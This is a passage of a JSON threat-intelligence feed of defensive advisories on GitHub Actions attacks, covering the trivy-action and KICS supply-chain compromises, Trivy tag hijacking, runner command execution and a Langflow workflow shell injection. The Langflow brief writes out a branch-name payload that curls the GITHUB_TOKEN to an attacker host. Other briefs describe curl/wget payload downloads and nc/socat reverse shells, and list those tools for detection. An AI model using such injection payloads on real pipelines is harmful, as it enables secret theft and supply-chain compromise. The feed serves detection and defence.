IDs (PIDs) to discover runner processes.\u003c/li\u003e\n\u003cli\u003eAfter credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.\u003c/li\u003e\n\u003cli\u003eStolen credentials and secrets are likely exfiltrated to a attacker controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipelines for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action and verify the integrity of the action being used.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runners.\u003c/li\u003e\n\u003cli\u003eMonitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).\u003c/li\u003e\n\u003cli\u003eEnable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.\u003c/li\u003e\n\u003cli\u003eImplement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:12:22Z","date_published":"2026-03-28T08:12:22Z","id":"/briefs/2026-03-trivy-action-compromise/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.","title":"Compromised trivy-action GitHub Action Enables Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["shell-injection","github-actions","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eLangflow, a tool for building and deploying AI-powered agents and workflows, is vulnerable to a critical shell injection flaw in its GitHub Actions workflows. Discovered in versions prior to 1.9.0 and assigned CVE-2026-33475, the vulnerability stems from unsanitized interpolation of GitHub context variables (e.g., \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e) within the \u003ccode\u003erun:\u003c/code\u003e steps of various workflow files. By crafting malicious branch names or pull request titles, attackers can inject and execute arbitrary shell commands during CI/CD pipeline execution. Successful exploitation allows for the exfiltration of sensitive CI/CD secrets like \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, manipulation of infrastructure, and potential compromise of the software supply chain. The vulnerability was patched in version 1.9.0. This poses a significant risk to any public Langflow fork with GitHub Actions enabled.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker forks the Langflow repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new branch with a specially crafted name containing a shell injection payload, such as \u003ccode\u003einjection-test \u0026amp;\u0026amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker submits a pull request from the malicious branch to the main branch of the forked repository.\u003c/li\u003e\n\u003cli\u003eGitHub Actions is triggered to run the affected workflow (e.g., \u003ccode\u003edeploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWithin the workflow, the \u003ccode\u003erun:\u003c/code\u003e step attempts to use the unsanitized branch name via \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected shell command executes, sending the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e and can now authenticate to the GitHub API with the privileges of the affected workflow.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to push malicious code, create new releases, or tamper with other aspects of the software supply chain.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability allows for arbitrary code execution within the GitHub Actions CI/CD environment. A successful attack grants full access to CI secrets, potentially leading to the exfiltration of the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e. The attacker can then push malicious tags or container images, tamper with releases, or leak sensitive infrastructure data.  Given the nature of CI/CD pipelines, a compromise could have far-reaching effects on any project that depends on the affected Langflow repository or its forks. The number of potential victims is directly proportional to the number of Langflow forks with enabled GitHub Actions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Langflow version 1.9.0 or later to patch CVE-2026-33475.\u003c/li\u003e\n\u003cli\u003eExamine GitHub Actions workflows for direct interpolation of GitHub context variables in \u003ccode\u003erun:\u003c/code\u003e steps, particularly those involving user-controlled values like branch names and pull request titles (e.g., in \u003ccode\u003e.github/workflows/deploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eImplement proper sanitization or quoting of untrusted inputs before using them in shell commands within GitHub Actions workflows.\u003c/li\u003e\n\u003cli\u003eAdopt the suggested fix of using environment variables and wrapping them in double quotes when referencing GitHub context variables within \u003ccode\u003erun:\u003c/code\u003e steps (as described in the overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Github Actions Shell Injection via Branch Name\u003c/code\u003e to identify potentially malicious branch names used in pull requests.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-langflow-shell-injection/","summary":"Unauthenticated remote shell injection vulnerability exists in Langflow GitHub Actions workflows prior to version 1.9.0, enabling attackers to execute arbitrary shell commands via malicious branch names or pull request titles due to unsanitized GitHub context variable interpolation, leading to potential secret exfiltration and supply chain compromise.","title":"Langflow GitHub Actions Shell Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github-actions","ci/cd"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 23, 2026, Wiz.io reported a supply chain attack targeting the KICS (Keeping Infrastructure Configuration Secure) GitHub Action. The threat actor, identified as TeamPCP, successfully compromised the KICS GitHub Action, potentially impacting numerous organizations utilizing the action in their CI/CD pipelines. This incident highlights the risks associated with supply chain dependencies and the potential for malicious actors to inject malicious code into widely used software components. The KICS GitHub Action is used to scan infrastructure-as-code (IaC) files for security vulnerabilities, making its compromise a significant security concern. Organizations that used the compromised version of the action may have had their secrets exfiltrated, or their infrastructure configurations altered.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eDue to the limited information, the attack chain below is based on a typical supply chain compromise scenario:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the KICS GitHub Action repository or its build process.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into the KICS GitHub Action. This code could be designed to exfiltrate sensitive information, modify infrastructure configurations, or establish a backdoor.\u003c/li\u003e\n\u003cli\u003eA new version of the KICS GitHub Action, containing the malicious code, is released and made available on the GitHub Marketplace.\u003c/li\u003e\n\u003cli\u003eOrganizations using the KICS GitHub Action automatically update to the compromised version through their CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes within the CI/CD environments of victim organizations, potentially gaining access to environment variables, secrets, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates collected data to attacker-controlled infrastructure.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the exfiltrated data to further compromise the victim\u0026rsquo;s infrastructure or gain unauthorized access to their systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the KICS GitHub Action represents a significant supply chain risk. Organizations utilizing the compromised action in their CI/CD pipelines could have experienced exfiltration of sensitive data, including API keys, credentials, and infrastructure configurations. Successful exploitation could lead to unauthorized access to cloud resources, data breaches, and disruption of services. While the exact number of affected organizations remains unclear, the widespread use of KICS suggests a potentially large impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInvestigate CI/CD pipeline logs for usage of the compromised KICS GitHub Action version (refer to Overview).\u003c/li\u003e\n\u003cli\u003eAudit GitHub Action dependencies in CI/CD pipelines to identify and remove any unauthorized or suspicious actions (refer to Overview).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic originating from CI/CD environments for connections to unusual or malicious destinations (based on potential exfiltration in Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement stricter access controls and monitoring for GitHub Action repositories and build processes to prevent future supply chain attacks (refer to Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious script execution within GitHub Action workflows to identify potential malicious activity (see rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T19:20:57Z","date_published":"2026-03-23T19:20:57Z","id":"/briefs/2024-06-07-teampcp-kics-supply-chain/","summary":"TeamPCP conducted a supply chain attack compromising the KICS GitHub Action, impacting users who integrated the compromised version into their CI/CD pipelines.","title":"TeamPCP Compromise of KICS GitHub Action Supply Chain","url":"https://feed.craftedsignal.io/briefs/2024-06-07-teampcp-kics-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github-actions","ci/cd","tag-hijacking"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 20, 2026, a breach was reported affecting the Trivy Security Scanner GitHub Actions. The incident involved the hijacking of 75 tags associated with the project. While the exact method of tag hijacking is not detailed, the attacker\u0026rsquo;s objective was to steal CI/CD secrets. This attack could affect any project using the compromised tags in their GitHub Actions workflows. Successful exploitation allows an attacker to gain access to sensitive credentials, API keys, and other secrets stored within the CI/CD environment, leading to potential data breaches, supply chain compromise, and unauthorized access to critical systems. Defenders should focus on detecting and preventing unauthorized modifications to GitHub Action workflows and monitoring for suspicious access to CI/CD secrets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises the GitHub repository or account with permissions to manage tags for the Trivy Security Scanner GitHub Actions.\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies existing tags (75 in this case) to point to malicious code repositories.\u003c/li\u003e\n\u003cli\u003eUsers unknowingly include the compromised tags in their GitHub Actions workflows, triggering the malicious code during CI/CD pipeline execution.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes within the user\u0026rsquo;s CI/CD environment, gaining access to environment variables and secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code exfiltrates the stolen CI/CD secrets to an external server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen secrets to gain unauthorized access to victim\u0026rsquo;s systems, cloud resources, or code repositories.\u003c/li\u003e\n\u003cli\u003eThe attacker may further compromise the victim\u0026rsquo;s infrastructure, inject malicious code into software builds, or steal sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis attack has the potential to impact a wide range of organizations that rely on the Trivy Security Scanner GitHub Actions in their CI/CD pipelines. The successful theft of CI/CD secrets can lead to significant data breaches, supply chain compromise, and unauthorized access to critical infrastructure. The scope of impact depends on the number of users affected by the compromised tags and the sensitivity of the secrets stored within their CI/CD environments. The incident could result in financial losses, reputational damage, and legal liabilities for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview GitHub Actions workflows for use of the compromised Trivy Security Scanner tags (reference: Overview).\u003c/li\u003e\n\u003cli\u003eImplement stricter access controls and multi-factor authentication for GitHub accounts with permissions to manage tags (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect suspicious script execution within GitHub Actions workflows (reference: rules).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections originating from CI/CD environments, indicative of secret exfiltration (reference: rules).\u003c/li\u003e\n\u003cli\u003eImplement secrets scanning tools to detect exposed credentials and API keys within code repositories and CI/CD environments (reference: Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-21T12:00:00Z","date_published":"2026-03-21T12:00:00Z","id":"/briefs/2026-03-trivy-tag-hijacking/","summary":"Attackers hijacked 75 tags associated with the Trivy Security Scanner GitHub Actions to steal CI/CD secrets from users of the compromised tags.","title":"Trivy Security Scanner GitHub Actions Tag Hijacking for CI/CD Secret Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-tag-hijacking/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github-actions","supply-chain","execution","devops"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat focuses on the exploitation of GitHub Actions runners by malicious actors. By gaining the ability to modify or trigger workflows in a linked GitHub repository, attackers can execute arbitrary commands on the runner host. The attack leverages the \u003ccode\u003eRunner.Worker\u003c/code\u003e process or shell interpreters launched via runner entrypoint scripts. Successful exploitation can lead to malicious workflow activity, including code execution, reconnaissance, credential harvesting, and network exfiltration. This presents a significant risk, particularly for organizations relying on self-hosted runners, as it allows attackers to potentially compromise the underlying infrastructure and sensitive data. The Elastic detection rule aims to identify such malicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository linked to a self-hosted runner.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies an existing workflow or creates a new one to inject malicious commands.\u003c/li\u003e\n\u003cli\u003eThe compromised workflow is triggered, initiating the \u003ccode\u003eRunner.Worker\u003c/code\u003e process on the runner host.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eRunner.Worker\u003c/code\u003e process executes a shell interpreter (e.g., bash, sh, zsh) via an entrypoint script.\u003c/li\u003e\n\u003cli\u003eThe shell interpreter executes malicious commands specified in the compromised workflow, such as downloading a payload using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, establishing a reverse shell connection to an attacker-controlled server using \u003ccode\u003enc\u003c/code\u003e or \u003ccode\u003esocat\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance, credential harvesting, or lateral movement within the runner host and connected network.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated from the compromised runner host to the attacker\u0026rsquo;s infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of the self-hosted runner environment. This could result in the theft of sensitive source code, credentials, and other proprietary information. The attack can also be used as a stepping stone for further attacks on the organization\u0026rsquo;s internal network and infrastructure. Affected sectors include software development, DevOps, and any organization using GitHub Actions with self-hosted runners.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via GitHub Actions Runner\u003c/code\u003e to your SIEM to detect suspicious commands executed by the GitHub Actions Runner.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for commands like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ebash\u003c/code\u003e, and \u003ccode\u003essh\u003c/code\u003e spawned by \u003ccode\u003eRunner.Worker\u003c/code\u003e or shell interpreters with \u003ccode\u003eentrypoint.sh\u003c/code\u003e in their command line (see Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies for GitHub repositories and workflows to prevent unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit GitHub Actions workflows for suspicious or unexpected commands.\u003c/li\u003e\n\u003cli\u003eIsolate self-hosted runners in a segmented network to limit the impact of a potential compromise.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to provide detailed process execution information for effective detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-github-actions-runner-execution/","summary":"Adversaries compromising GitHub Actions workflows can execute arbitrary commands on runner hosts, leading to code execution, reconnaissance, credential harvesting, or network exfiltration.","title":"Execution via GitHub Actions Runner","url":"https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/"}],"language":"en","title":"CraftedSignal Threat Feed — Github-Actions","version":"https://jsonfeed.org/version/1.1"}